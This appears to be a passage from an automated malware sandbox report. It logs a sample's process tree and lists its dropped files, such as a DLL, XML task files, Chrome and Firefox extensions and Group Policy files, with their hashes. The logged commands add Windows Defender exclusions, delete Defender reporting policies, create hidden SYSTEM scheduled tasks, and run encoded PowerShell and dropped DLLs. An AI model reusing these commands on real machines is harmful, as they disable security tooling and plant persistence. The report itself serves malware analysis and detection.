                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3696
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:4648
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3944
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gvZuabMBW" /SC once /ST 14:49:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4464
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gvZuabMBW"
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2896
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "gvZuabMBW"
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4020
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 11:50:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\VhLgLDY.exe\" 18 /site_id 525403 /S" /V1 /F
                                        2⤵
                                        • Drops file in Windows directory
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:652
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "MFUxwpyluZmBswWip"
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1716
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                      1⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2600
                                      • C:\Windows\system32\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        2⤵
                                          PID:2720
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                        1⤵
                                          PID:3532
                                        • C:\Windows\system32\gpscript.exe
                                          gpscript.exe /RefreshSystemParam
                                          1⤵
                                            PID:1704
                                          • C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\VhLgLDY.exe
                                            "C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\VhLgLDY.exe" 18 /site_id 525403 /S
                                            1⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops Chrome extension
                                            • Drops desktop.ini file(s)
                                            • Drops file in System32 directory
                                            • Drops file in Program Files directory
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4000
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:544
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4004
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5084
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                              2⤵
                                                PID:1556
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3752
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\fDvnMI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F
                                                2⤵
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4772
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\KSQZcHI.xml" /RU "SYSTEM"
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1392
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /END /TN "SEVCueFJyRflUhU"
                                                2⤵
                                                  PID:3984
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /DELETE /F /TN "SEVCueFJyRflUhU"
                                                  2⤵
                                                    PID:4420
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\rQnvQlL.xml" /RU "SYSTEM"
                                                    2⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4688
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\tiAGfYF.xml" /RU "SYSTEM"
                                                    2⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:680
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\oUFWCjr.xml" /RU "SYSTEM"
                                                    2⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:436
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\wXUucYD.xml" /RU "SYSTEM"
                                                    2⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:232
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 10:00:04 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\NRHhPcRj\FdlbuYf.dll\",#1 /site_id 525403" /V1 /F
                                                    2⤵
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3164
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "NGWtXtGwgKKYsphzV"
                                                    2⤵
                                                      PID:2688
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2008
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2252
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                      2⤵
                                                        PID:1524
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4552
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /DELETE /F /TN "MFUxwpyluZmBswWip"
                                                        2⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4924
                                                    • C:\Windows\system32\rundll32.EXE
                                                      "C:\Windows\system32\rundll32.EXE" "C:\Windows\Temp\YSrBLfWUtIHnuviW\NRHhPcRj\FdlbuYf.dll",#1 /site_id 525403
                                                      1⤵
                                                        PID:1528
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\system32\rundll32.EXE" "C:\Windows\Temp\YSrBLfWUtIHnuviW\NRHhPcRj\FdlbuYf.dll",#1 /site_id 525403
                                                          2⤵
                                                          • Checks BIOS information in registry
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Enumerates system info in registry
                                                          • Modifies data under HKEY_USERS
                                                          PID:4772
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /DELETE /F /TN "NGWtXtGwgKKYsphzV"
                                                            3⤵
                                                              PID:1172

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Program Files (x86)\UBqYudvSNocU2\rQnvQlL.xml

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          a2ca2605f3c69eaf3dd87a8a5dd803f9

                                                          SHA1

                                                          406e7c97d1cf2a8d995cd4338d65ebc5e60e858a

                                                          SHA256

                                                          98891b0fa5eb074314d3e36e1e0846af1b210c53bbdf282e8475b98fa7690fa9

                                                          SHA512

                                                          230aab97a2d063ffc8b623d886f3058425ea76f0ae72937ca6314a7551cfb5a6c21b963f44ee85b37ab8f299b74fce105b5d86121e0ddf9b8bef31192670468a

                                                        • C:\Program Files (x86)\ZUXSmeDRU\KSQZcHI.xml

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          f40de082b8f357feb2dec78a8bc6d91e

                                                          SHA1

                                                          e9f0e7651c5b098388791f5f149c448c2c3f13a6

                                                          SHA256

                                                          118f68b3fd7ee908fa014896e9192b4f30aba797f460da78a5365b1a2c02c36a

                                                          SHA512

                                                          36571f129f476f8b66b0bda6dc6c6d217ad9fc90d61253dae75d8f67880ad98b2be4e6f5a2542452b78b30d64996e7471be89b044282219e75d95355fd48def4

                                                        • C:\Program Files (x86)\oXjeNNLqKAotC\wXUucYD.xml

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          1d850a5acb2532cb298909a96bc1ca12

                                                          SHA1

                                                          c2c1037b23a833cc245dd7867a16ddad1fc9ad00

                                                          SHA256

                                                          e210571614d427f702a451d4bb7678b8cdb9ffb04b20ea0d5daf7459db532db1

                                                          SHA512

                                                          fae5529f8041c8e8137fcb2fecac3d6564420d5c2075436193b59930b783858659400921893c21a31fc0353dcf38f897beffb9101c1bbfa0ee16691ee8ed274f

                                                        • C:\Program Files (x86)\xonCRuklPFipnPeqKpR\oUFWCjr.xml

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          43b446bfd8d45b44ba15f1ecf4a36a6e

                                                          SHA1

                                                          31331ea0badc081c9f5f81aea243d9cbea7e4ab9

                                                          SHA256

                                                          876ba909c954a93ae9a9d72517cb69414e733a843b04965b8eaca4305c4f7532

                                                          SHA512

                                                          18c7cd30caa12e286cc99c12842456d8419396c026579b138a338863814eea02e1372a5363707ba3cd9e9e53b3511326d3a21773e1c6a9bb594f7b5461d57290

                                                        • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                          Filesize

                                                          1.1MB

                                                          MD5

                                                          670dcc60ac82d276dc5761a0e99948d1

                                                          SHA1

                                                          4e0c35213c86abd0d966d67e1a1e3ad8ddc5ff00

                                                          SHA256

                                                          208d37ed799e705f23e93c9d8c1263f755c0168192cf57f6995aa896e36deddc

                                                          SHA512

                                                          06a738dc865e333389178369cba800866b9fc51a9141074b2816fa3f8c6eef363220bf2feb690636dae0532eecd55643655323aa608c52ce19ec9d2db3a972e3

                                                        • C:\ProgramData\hrOORTLiECQfZJVB\tiAGfYF.xml

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          2da553f10cde001bd661384e7907ccec

                                                          SHA1

                                                          311489cbcdeb5feb108b5bd7d49576958242d391

                                                          SHA256

                                                          479d5747bc848053ed82ef07d8192600f5862ee40b3ee597cbcd339a1610dc53

                                                          SHA512

                                                          4559987f8dd17d7519eea933b3417d780e80eedbb0f7632386348f4207852badd82efb4056dfefb343e747df4c35403e8499dc178d7b75bed205ffdf2dd31886

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                          Filesize

                                                          187B

                                                          MD5

                                                          2a1e12a4811892d95962998e184399d8

                                                          SHA1

                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                          SHA256

                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                          SHA512

                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                          Filesize

                                                          136B

                                                          MD5

                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                          SHA1

                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                          SHA256

                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                          SHA512

                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                          Filesize

                                                          150B

                                                          MD5

                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                          SHA1

                                                          6a51537cef82143d3d768759b21598542d683904

                                                          SHA256

                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                          SHA512

                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          713ad359b75fe6d947468ec1825202b9

                                                          SHA1

                                                          19dcd19f18a2ad6deb581451aad724bd44a592a4

                                                          SHA256

                                                          56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

                                                          SHA512

                                                          4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          64B

                                                          MD5

                                                          5caad758326454b5788ec35315c4c304

                                                          SHA1

                                                          3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                          SHA256

                                                          83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                          SHA512

                                                          4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                        • C:\Users\Admin\AppData\Local\Temp\7zS5DC0.tmp\Install.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          6cb87a9fc7dc1f2a5410fd428f5460f0

                                                          SHA1

                                                          2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

                                                          SHA256

                                                          fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

                                                          SHA512

                                                          4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_akkrslaq.hiy.ps1

                                                          Filesize

                                                          60B

                                                          MD5

                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                          SHA1

                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                          SHA256

                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                          SHA512

                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\prefs.js

                                                          Filesize

                                                          11KB

                                                          MD5

                                                          c0a86e773f3372f666037a7814f42551

                                                          SHA1

                                                          8b3d8c7391a3578c29af02c588c2c9a15ede1fd6

                                                          SHA256

                                                          f18152ab827268bd522b68d3d9fe888cf7ad194e7547ead35ce7c706cd9e4a53

                                                          SHA512

                                                          a3acec75716ca7dfd501e6b71d5446ad07ab58c6df269c0c340f6034b4d80c44023224b0aec61c5ed1dceeebe574758d9bfeaf9e023e2c4c982f95cf3fc864e4

                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          c3c8c7edc7bdeb3c512771a68bd878ab

                                                          SHA1

                                                          0be3d1e296640d418a890041fd5d3b12ceea71df

                                                          SHA256

                                                          136776ac6adcb472e0ed37035f6f773df3fb5d347f017fea3f1f2af0b103e5f2

                                                          SHA512

                                                          dc9bdc7f504cefb344dbeaaf11f924c4cebaefa4dcaa02fdff2baca56f4864c4f81a49c525db7c9f7cc2cfa306f4c8bdfbce1043b9182d94627de76d1805e33f

                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          11KB

                                                          MD5

                                                          a4c7a12e8b65d96f449554aef59640b4

                                                          SHA1

                                                          445b6c231d2869c6793fc6836911d976a7c4da58

                                                          SHA256

                                                          2b49d5528cdf744be0775374092ad9fd4a798afc68fa2da4a1fc422822b2808f

                                                          SHA512

                                                          242c94ee1002e8df75a51b9318f1c6504d4d800536e667e4f534694e1d6761b39490b5d5118354eb2ecced601ee878f652fcd4811c6851e892d3c8883c21be97

                                                        • C:\Windows\Temp\YSrBLfWUtIHnuviW\NRHhPcRj\FdlbuYf.dll

                                                          Filesize

                                                          6.2MB

                                                          MD5

                                                          8cfc8a5c654e986ab3de168ecbc93096

                                                          SHA1

                                                          a745e47565aed873f5f5264543479266d8918a64

                                                          SHA256

                                                          2996bcb9d033414f6dce67539a71bf29250dc19a66424944065bf5cdf285500a

                                                          SHA512

                                                          99398bbaed5f5547331f21c9e9b2eda5b4842ad88b950f1cce4a04202d45a25a83fdd1593f6b15d05fdee7ba4872ba287b4a5e5c1a0c8c337311eb8b3326dac3

                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                          Filesize

                                                          4KB

                                                          MD5

                                                          8a9430680a4833284c613258ea9bd4be

                                                          SHA1

                                                          934ea5871895c463aaac80435b6b3cf46cfc6a1b

                                                          SHA256

                                                          65d67fefe9e0da2e7c0795e2a221f93a188f5f9a06b3779fa86abf9c5a729c22

                                                          SHA512

                                                          214633180e8ddc7cd15ed204355fb065f2018abd979a68dd5c297b3cb0bc52825f9c16dadeb479a42c990a16c334bc4fb22d067845f31d0c54aec254f02cbbcd

                                                        • C:\Windows\system32\GroupPolicy\gpt.ini

                                                          Filesize

                                                          268B

                                                          MD5

                                                          a62ce44a33f1c05fc2d340ea0ca118a4

                                                          SHA1

                                                          1f03eb4716015528f3de7f7674532c1345b2717d

                                                          SHA256

                                                          9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                          SHA512

                                                          9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                        • memory/2108-42-0x0000000004DA0000-0x0000000004DEC000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/2108-26-0x00000000013A0000-0x00000000013D6000-memory.dmp

                                                          Filesize

                                                          216KB

                                                        • memory/2108-29-0x0000000004680000-0x00000000046E6000-memory.dmp

                                                          Filesize

                                                          408KB

                                                        • memory/2108-40-0x0000000004760000-0x0000000004AB7000-memory.dmp

                                                          Filesize

                                                          3.3MB

                                                        • memory/2108-30-0x00000000046F0000-0x0000000004756000-memory.dmp

                                                          Filesize

                                                          408KB

                                                        • memory/2108-27-0x0000000003FB0000-0x000000000467A000-memory.dmp

                                                          Filesize

                                                          6.8MB

                                                        • memory/2108-41-0x0000000004D50000-0x0000000004D6E000-memory.dmp

                                                          Filesize

                                                          120KB

                                                        • memory/2108-28-0x0000000003E10000-0x0000000003E32000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/2172-6-0x0000000010000000-0x0000000010B5D000-memory.dmp

                                                          Filesize

                                                          11.4MB

                                                        • memory/2440-23-0x0000000010000000-0x0000000010B5D000-memory.dmp

                                                          Filesize

                                                          11.4MB

                                                        • memory/4000-86-0x0000000003890000-0x0000000003915000-memory.dmp

                                                          Filesize

                                                          532KB

                                                        • memory/4000-122-0x0000000003BD0000-0x0000000003C38000-memory.dmp

                                                          Filesize

                                                          416KB

                                                        • memory/4000-279-0x00000000046C0000-0x0000000004736000-memory.dmp

                                                          Filesize

                                                          472KB

                                                        • memory/4000-290-0x0000000004F60000-0x000000000501A000-memory.dmp

                                                          Filesize

                                                          744KB

                                                        • memory/4236-10-0x00000175B7D90000-0x00000175B7DB2000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/4772-309-0x00000000027B0000-0x000000000330D000-memory.dmp

                                                          Filesize

                                                          11.4MB